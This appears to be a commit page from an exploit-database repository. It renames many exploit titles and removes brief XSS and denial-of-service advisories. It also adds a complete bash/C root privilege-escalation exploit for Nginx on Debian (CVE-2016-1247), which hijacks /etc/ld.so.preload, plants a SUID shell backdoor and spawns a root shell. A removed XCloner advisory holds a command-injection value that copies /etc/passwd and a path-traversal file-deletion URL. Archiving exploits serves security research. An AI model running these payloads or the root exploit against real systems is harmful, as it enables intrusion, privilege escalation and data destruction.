mg-soft net Inspector 6.5.0.828 - Multiple Vulnerabilities
MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities

ZYXEL ZyWALL Quagga/Zebra - (Default Password) Remote Root Exploit
ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Root Exploit

Red Hat Linux 7.0 Apache - Remote 'Username' Enumeration
RedHat Linux 7.0 Apache - Remote 'Username' Enumeration

Red Hat Interchange 4.8.x - Arbitrary File Read
RedHat Interchange 4.8.x - Arbitrary File Read

Red Hat Apache 2.0.40 - Directory Index Default Configuration Error
RedHat Apache 2.0.40 - Directory Index Default Configuration Error

Foreman (Red Hat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit)
Foreman (RedHat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit)

Red Hat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities
RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities

Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)
RedHat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)

Katello (Red Hat Satellite) - users/update_roles Missing Authorisation (Metasploit)
Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)

Red Hat Stronghold Web Server 2.3 - Cross-Site Scripting
RedHat Stronghold Web Server 2.3 - Cross-Site Scripting

Red Hat Piranha - Remote Security Bypass
RedHat Piranha - Remote Security Bypass

KISGB 5.1.1 - (Authenticate.php) Remote File Inclusion
KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion

Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion
Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion

phpBP RC3 - (2.204) (SQL Injection / cmd) Remote Code Execution
phpBP RC3 (2.204) - SQL Injection / Remote Code Execution
eXV2 Module MyAnnonces - (lid) SQL Injection
eXV2 Module eblog 1.2 - (blog_id) SQL Injection
eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection
eXV2 Module WebChat 1.60 - (roomid) SQL Injection
eXV2 Module MyAnnonces - 'lid' Parameter SQL Injection
eXV2 Module eblog 1.2 - 'blog_id' Parameter SQL Injection
eXV2 Module Viso 2.0.4.3 - 'kid' Parameter SQL Injection
eXV2 Module WebChat 1.60 - 'roomid' Parameter SQL Injection

Fuzzylime CMS 3.01 - (admindir) Remote File Inclusion
Fuzzylime CMS 3.01 - 'admindir' Parameter Remote File Inclusion

Exero CMS 1.0.1 - (theme) Multiple Local File Inclusion
Exero CMS 1.0.1 - 'theme' Parameter Multiple Local File Inclusion

Joomla! Component Acajoom (com_acajoom) - SQL Injection
Joomla! Component Acajoom 1.1.5 - SQL Injection
ASPapp Knowledge Base - 'links.asp CatId' SQL Injection
Joomla! Component joovideo 1.2.2 - 'id' SQL Injection
Joomla! Component Alberghi 2.1.3 - 'id' SQL Injection
Mambo Component 'com_accombo' 1.x - 'id' SQL Injection
Joomla! Component Restaurante 1.0 - 'id' SQL Injection
PEEL CMS - Admin Hash Extraction / Arbitrary File Upload
RunCMS Module section - (artid) SQL Injection
ASPapp Knowledge Base - SQL Injection
ASPapp Knowledge Base - 'CatId' Parameter SQL Injection
Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection
Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection
Mambo Component Accombo 1.x - 'id' Parameter SQL Injection
Joomla! Component Restaurante 1.0 - 'id' Parameter SQL Injection
PEEL CMS 3.x - Admin Hash Extraction / Arbitrary File Upload
RunCMS Module section - 'artid' Parameter SQL Injection
ASPapp Knowledge Base - SQL Injection
RunCMS Module Photo 3.02 - 'cid' SQL Injection
D.E. Classifieds - 'cat_id' SQL Injection
RunCMS Module Photo 3.02 - 'cid' Parameter SQL Injection
D.E. Classifieds - 'cat_id' Parameter SQL Injection

PHP-Nuke Platinum 7.6.b.5 - (dynamic_titles.php) SQL Injection
PHP-Nuke Platinum 7.6.b.5 - 'dynamic_titles.php' SQL Injection
Joomla! Component rekry 1.0.0 - (op_id) SQL Injection
destar 0.2.2-5 - Arbitrary Add New User Exploit
Joomla! Component rekry 1.0.0 - 'op_id' Parameter SQL Injection
Destar 0.2.2-5 - Arbitrary Add New User Exploit

destar 0.2.2-5 - Arbitrary Add Admin
Destar 0.2.2-5 - Arbitrary Add Admin
BolinOS 4.6.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Security Vulnerabilities
Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection
BolinOS 4.6.1 - Local File Inclusion / Cross-Site Scripting
Joomla! Component Alphacontent 2.5.8 - 'id' Parameter SQL Injection

TopperMod 1.0 - (mod.php) Local File Inclusion
TopperMod 1.0 - 'mod.php' Local File Inclusion

Joomla! Component MyAlbum 1.0 - (album) SQL Injection
Joomla! Component MyAlbum 1.0 - 'album' Parameter SQL Injection

Smoothflash - 'admin_view_image.php cid' SQL Injection
Smoothflash - 'cid' Parameter SQL Injection
JShop 1.x < 2.x - (page.php xPage) Local File Inclusion
WordPress Plugin Download - (dl_id) SQL Injection
PHPSpamManager 0.53b - (body.php) Remote File Disclosure
Woltlab Burning Board Addon JGS-Treffen - SQL Injection
Neat weblog 0.2 - 'articleId' SQL Injection
EasyNews 40tr - (SQL Injection / Cross-Site Scripting / Local File Inclusion) SQL Injection
FaScript FaPhoto 1.0 - (show.php id) SQL Injection
Mambo Component 'com_ahsshop' 1.51 - 'vara' Parameter SQL Injection
eggBlog 4.0 - Password Retrieve SQL Injection
Joomla! Component actualite 1.0 - 'id' SQL Injection
JShop 1.x < 2.x - 'xPage' Parameter Local File Inclusion
WordPress Plugin Download - 'dl_id' Parameter SQL Injection
PHPSpamManager 0.53b - 'body.php' Remote File Disclosure
Woltlab Burning Board Addon JGS-Treffen 2.0.2 - SQL Injection
Neat weblog 0.2 - 'articleId' Parameter SQL Injection
EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion
FaScript FaPhoto 1.0 - 'show.php' SQL Injection
Mambo Component Ahsshop 1.51 - 'vara' Parameter SQL Injection
eggBlog 4.0 - SQL Injection
Joomla! Component actualite 1.0 - 'id' Parameter SQL Injection

PHPAddressBook 2.11 - (view.php id) SQL Injection
PHPAddressBook 2.11 - 'view.php' SQL Injection

Joomla! Component com_alphacontent - Blind SQL Injection
Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection

Joomla! Component 'com_eventbooking' 2.10.1 - SQL Injection
Joomla! Component Event Booking 2.10.1 - SQL Injection

Nuked-klaN 1.3 - Multiple Cross-Site Scripting Vulnerabilities

JShop E-Commerce Suite - xSearch Cross-Site Scripting

JShop E-Commerce Suite 3.0 - 'page.php' Cross-Site Scripting

JShop E-Commerce Suite 1.2 - product.php Cross-Site Scripting

Nuked-klaN 1.7 Sections Module - artid Parameter SQL Injection
Nuked-klaN 1.7 Sections Module - 'artid' Parameter SQL Injection
Nuked-klaN 1.7 Download Module - dl_id Parameter SQL Injection
Nuked-klaN 1.7 Links Module - link_id Parameter SQL Injection
Nuked-klaN 1.7 Download Module - 'dl_id' Parameter SQL Injection
Nuked-klaN 1.7 Links Module - 'link_id' Parameter SQL Injection

Nuked-klaN 1.7 - 'index.php' Cross-Site Scripting

Foreman (Red Hat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)
Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)
Eggblog 3.1 - admin/articles.php edit Parameter Cross-Site Scripting
Eggblog 3.1 - admin/comments.php edit Parameter Cross-Site Scripting
Eggblog 3.1 - admin/users.php add Parameter Cross-Site Scripting

Eggblog 3.1 - rss.php Cross-Site Scripting

Nuked-klaN 1.7.5 - File Parameter News Module Cross-Site Scripting

Cuteflow Bin 1.5 - pages/showtemplates.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/editmailinglist_step1.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/showcirculation.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/edittemplate_step2.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting
CS-Cart 4.3.10 - XML External Entity Injection

CoronaMatrix phpAddressBook 2.0 - 'Username' Cross-Site Scripting

Cisco BBSM Captive Portal 5.3 - 'AccesCodeStart.asp' Cross-Site Scripting

Cacti 0.8.7 (Red Hat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting
Cacti 0.8.7 (RedHat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting

Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload

Mambo Component 'com_ahsshop' - SQL Injection
Mambo Component Ahsshop - SQL Injection

Wordpress Plugin Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities

Wordpress Plugin Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting

Joomla 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation
Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation

WordPress Plugin XCloner 3.1.5 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-11-17 05:01:21 +00:00
parent 2e7215ec08
commit e1c4e9e1ec
27 changed files with 605 additions and 520 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

552
files.csv
View file

File diff suppressed because it is too large Load diff

9
platforms/asp/webapps/31786.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/29191/info
Cisco BBSM (Building Broadband Service Manager) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Cisco BBSM 5.3 is vulnerable; other versions may also be affected.
http://www.example.com/ekgnkm/AccessCodeStart.asp?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

0
platforms/php/webapps/5286.txt → platforms/asp/webapps/5286.txt
View file

231
platforms/linux/local/40768.sh Executable file
View file

@ -0,0 +1,231 @@
#!/bin/bash
#
# Source: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#
# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit
# nginxed-root.sh (ver. 1.0)
#
# CVE-2016-1247
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# https://legalhackers.com
#
# Follow https://twitter.com/dawid_golunski for updates on this advisory.
#
# ---
# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu
# etc.) to escalate their privileges from nginx web server user (www-data) to root
# through unsafe error log handling.
#
# The exploit waits for Nginx server to be restarted or receive a USR1 signal.
# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)
# script which is called daily by the cron.daily on default installations.
# The restart should take place at 6:25am which is when cron.daily executes.
# Attackers can therefore get a root shell automatically in 24h at most without any admin
# interaction just by letting the exploit run till 6:25am assuming that daily logrotation
# has been configured.
#
#
# Exploit usage:
# ./nginxed-root.sh path_to_nginx_error.log
#
# To trigger logrotation for testing the exploit, you can run the following command:
#
# /usr/sbin/logrotate -vf /etc/logrotate.d/nginx
#
# See the full advisory for details at:
# https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#
# Video PoC:
# https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nginxrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $ERRORLOG
touch $ERRORLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Ctrl+C pressed"
cleanexit 0
}
#intro
cat <<_eascii_
_______________________________
< Is your server (N)jinxed ? ;o >
-------------------------------
\
\ __---__
_- /--______
__--( / \ )XXXXXXXXXXX\v.
.-XXX( O O )XXXXXXXXXXXXXXX-
/XXX( U ) XXXXXXX\
/XXXXX( )--_ XXXXXXXXXXX\
/XXXXX/ ( O ) XXXXXX \XXXXX\
XXXXX/ / XXXXXX \__ \XXXXX
XXXXXX__/ XXXXXX \__---->
---___ XXX__/ XXXXXX \__ /
\- --__/ ___/\ XXXXXX / ___--/=
\-\ ___/ XXXXXX '--- XXXXXX
\-\/XXX\ XXXXXX /XXXXX
\XXXXXXXXX \ /XXXXX/
\XXXXXX > _/XXXXX/
\XXXXX--__/ __-- XXXX/
-XXXXXXXX--------------- XXXXXX-
\XXXXXXXXXXXXXXXXXXXXXXXXXX/
""VXXXXXXXXXXXXXXXXXXV""
_eascii_
echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"
# Args
if [ $# -lt 1 ]; then
echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
exit 3
fi
# Priv check
echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
id | grep -q www-data
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n"
exit 3
fi
# Set target paths
ERRORLOG="$1"
if [ ! -f $ERRORLOG ]; then
echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n"
exit 3
fi
# [ Exploitation ]
trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi
# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
exit 2
fi
# Symlink the log file
rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] The server appears to be \033[94m(N)jinxed\033[0m (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`"
# Make sure the nginx access.log contains at least 1 line for the logrotation to get triggered
curl http://localhost/ >/dev/null 2>/dev/null
# Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily
# rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am)
echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..."
while :; do
sleep 1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
rm -f $ERRORLOG
break;
fi
done
# /etc/ld.so.preload should be owned by www-data user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
chmod 755 /etc/ld.so.preload
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo 2>/dev/null >/dev/null
# Check for the rootshell
ls -l $BACKDOORPATH
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m"
else
echo -e "\n[!] Failed to get root"
cleanexit 2
fi
rm -f $ERRORLOG
echo > $ERRORLOG
# Use the rootshell to perform cleanup that requires root privilges
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
# Reset the logging to error.log
$BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`"
# Execute the rootshell
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -i
# Job done.
cleanexit 0

9
platforms/multiple/dos/31477.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28413/info
The 'snircd' and 'ircd' daemons are prone to a remote denial-of-service vulnerability because the application fails to properly sanitize user-supplied input.
Successfully exploiting this issue allows remote attackers to crash the application, denying service to legitimate users.
This issue affects versions up to and including 'snircd' 1.3.4 and 'ircu' 2.10.12.12.
/mode nickname i i i i i i i i i i i i i i i r r r r s

11
platforms/php/webapps/22276.txt
View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/6916/info
It has been reported that Nuked-Klan beta 1.3 is prone to cross site scripting attacks. The problem occurs in the 'Team', 'News', and 'Liens' modules which fails to sufficiently sanitize user-supplied HTML and script code located in URI parameters.
This vulnerability was reported for Nuked-Klan beta 1.3; earlier versions may also be affected.
http://www.example.org/index.php?file=Team&op=<script>alert('Test');</script>
http://www.example.org/index.php?file=News&op=<script>alert('test');</script>
http://www.example.org/index.php?file=Liens&op=<script>alert('test');</script>

7
platforms/php/webapps/23666.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/9609/info
A vulnerability has been reported to exist in JShop E-Commerce that may allow a remote user to execute HTML or script code in a user's browser.
The issue is reported to exist due to improper sanitizing of user-supplied data. It has been reported that HTML and script code may be parsed via a URI parameter of the 'search.php' script. This vulnerability makes it possible for an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. This attack would occur in the security context of the site.
search.php?xSearch=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscrip%3E&submit=Search

7
platforms/php/webapps/24396.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/11003/info
Reportedly the JShop E-Commerce Suite is affected by a cross-site scripting vulnerability in the 'page.php' script. This issue is due to a failure of the application to properly santitize user-supplied input.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/page.php?xPage=<SCRIPT>alert(document.cookie)</SCRIPT>

9
platforms/php/webapps/25073.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/12403/info
JShop E-Commerce Suite is affected by a cross-site scripting vulnerability in the 'product.php' script.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
product.php?xSec=1&xProd=7"><script>alert(document.domain);</script>
product.php?xSec=1"><script>alert(document.domain);</script>&xProd=7

7
platforms/php/webapps/27148.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/16424/info
Nuked-klaN is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/index.php?file=Members&letter=[XSS]

7
platforms/php/webapps/29055.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/21134/info
Eggblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[path]/admin/articles.php?edit="><script>alert('Xmors')</script><

7
platforms/php/webapps/29056.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/21134/info
Eggblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[path]/admin/comments.php?edit="><script>alert('Xmors')</script><

7
platforms/php/webapps/29057.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/21134/info
Eggblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[path]/admin/users.php?add="><script>alert('Xmors')</script><

9
platforms/php/webapps/30752.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/26408/info
Eggblog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
Eggblog 3.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/home/rss.php/<script>alert(1)</script>

14
platforms/php/webapps/30769.txt
View file

@ -1,14 +0,0 @@
source: http://www.securityfocus.com/bid/26458/info
Nuked-Klan is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Nuked-Klan 1.7.5 is vulnerable; other versions may also be affected.
Exploit XSS:
The GET variable &#039;file&#039; has been set to:
&#039;;alert(String.fromCharCode(88,83,83))//\&#039;;alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88 ,83,83))//--></SCRIPT>">&#039;><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Proof-of-concpet URI:
http://www.example.com/index.php?file=News%3CScRiPt%20%0a%0d%3Ealert(1121436095)%3B%3C/ScRiPt%3E

9
platforms/php/webapps/31556.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28500/info
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
http://www.example.com/[path]//pages/showtemplates.php?language=<script>alert(1111)</script>

9
platforms/php/webapps/31557.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28500/info
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
http://www.example.com/[path]//pages/editmailinglist_step1.php?language=<script>alert(222)</script>

9
platforms/php/webapps/31558.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28500/info
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
http://www.example.com/[path]/page/showcirculation.php?language=<script>alert(1111)</script>

9
platforms/php/webapps/31559.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28500/info
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
http://www.example.com/[path]/pages/edittemplate_step2.php?language=<script>alert(1111)</script>

9
platforms/php/webapps/31560.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28500/info
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
http://www.example.com/[path]//pages/showfields.php?language=<script>alert(1111)</script>

9
platforms/php/webapps/31561.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28500/info
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
http://www.example.com/[path]//pages/showuser.php?language=<script>alert(1111)</script>

9
platforms/php/webapps/31718.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/29005/info
phpAddressBook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
phpAddressBook 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/pad/?username="<[XSS]

11
platforms/php/webapps/37173.txt
View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/53514/info
The Download Monitor plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Download Monitor 3.3.5.4 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=addtags="><script>alert(1)</script>
http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=addthumbnail="><script>alert(1)</script>
http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=downloads&s=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

9
platforms/php/webapps/37175.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/53517/info
The Download Manager plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Download Manager 2.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=file-manager/categories&cid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

47
platforms/php/webapps/40739.txt
View file

@ -1,47 +0,0 @@
# Exploit Title: XCloner <= 3.1.5 Multiple Vulnerabilities
# Google Dork: inurl:"plugins/xcloner-backup-and-restore/readme.txt" -site:wordpress.org
# Date: 08/11/2016
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: www.xcloner.com
# Software Link: https://es.wordpress.org/plugins/xcloner-backup-and-restore/
# Version: 3.1.5 and lower
# Tested on: Ubuntu 14 and PHP 5
# Product description: XCloner is a plugin for wordpress and Joomla! with more than 70.000 active installations to easily execute backup and restores on your CMS.
Authenticated DoS or CMS destruction
--------------------------------------------------------
Summary: XClonner does not check the file path is going to unlink
after unlinking it. Therefore, a deletion of random files on the file
system accesible by the web process is possible. A destruction of the
blog can be achieved with the following PoC:
1. Authenticate to wordpress with an administrator
2. Access to XCloner to the following URL:
* http://example.com/wp-admin/plugins.php?page=xcloner_show&option=xcloner&task=cron_delete&fconfig=../../../../wp-config.php
3. See how your wordpress stops working.
4. In case that the web server is running with higher privileges, a more destructive action would be possible deleting O.S. critical files.
Authenticated RCE
----------------------------
Summary:
XCloner does not filter the command line is being used to execute the
tar of a backup.
Random shell commands can be injected in this field.
A file creation in the file system can be achieved with the following PoC:
1. Authenticate to wordpress with an administrator
2. Access to Plugins -> XCloner
3. Navigate to Administration -> Configuration -> General
4. In "Server Use Options" set the field "Tar path or command" with
the following value:
* tar -h; cp /etc/passwd ./passwd.txt ; tar -k
5. Now go to "Actions -> Generate Backup"
6. Find the file passwd.txt in the wordpress root folder
7. Navigate to http://example.com/passwd.txt to see the file /etc/passwd
